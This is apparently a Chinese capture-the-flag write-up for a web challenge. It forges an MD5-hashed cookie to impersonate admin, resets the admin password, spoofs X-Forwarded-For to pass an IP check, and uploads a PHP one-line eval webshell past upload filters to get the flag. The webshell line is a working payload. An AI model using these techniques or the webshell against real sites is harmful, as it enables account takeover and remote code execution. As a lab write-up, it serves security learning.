进入页面后,发现是一个登录窗口,还有注册以及找回密码的操作,先注册一个账户登录,发现进去后是一个欢迎笑脸:
点击Manage,弹窗我不是admin,意味着思路就是我们可以想办法登录admin拿到更高权限。
再看看personal,发现是每一个账户的信息,注意到UID为5,说明账户中本来就有四个账号,除了admin,其他的用户名和密码都不知道
changePwd和Logout中没有什么可搜寻的线索
用bupsuite抓包Manage,发现cookie中的user参数,经过测试是5:ding
经过MD5加密后的值:
既然这样,就把uid=5
改成uid=1
,user的值改为1:admin
加密后的值,去拿到admin的信息:
在前面浏览网页时,首页的忘记密码选项中就是输入用户名生日地址,既然有了admin的信息,那我们就可以修改密码登录admin:
进入后,点击manage,弹窗ip不允许:
那就伪造ip,修改XFF:X-Forwarded-For:127.0.0.1
查看代码,发现有filemanage,do是一个参数,既然是问号表明,说明do有一个值,猜测是upload:
?module=filemanage&do=upload
进入是一个上传文件页面,那就上传一句话木马吧,但弹窗说这是php,说明这里有内容检测:
<?php @eval($_POST['123']); ?>
绕过内容检测和后缀名检测以及文件类型,拿到flag:
总结:
XFF伪造请求
文件上传漏洞
内容检测、后缀名检测、文件类型检测绕过